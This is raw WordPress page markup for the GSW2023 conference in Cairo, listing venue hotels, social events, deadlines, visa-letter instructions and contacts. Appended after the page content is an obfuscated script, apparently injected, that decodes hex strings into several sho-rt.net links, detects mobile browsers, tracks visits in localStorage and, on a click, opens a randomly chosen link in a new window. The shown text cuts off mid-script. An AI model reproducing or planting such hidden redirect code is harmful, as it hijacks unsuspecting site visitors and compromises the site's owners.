category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else 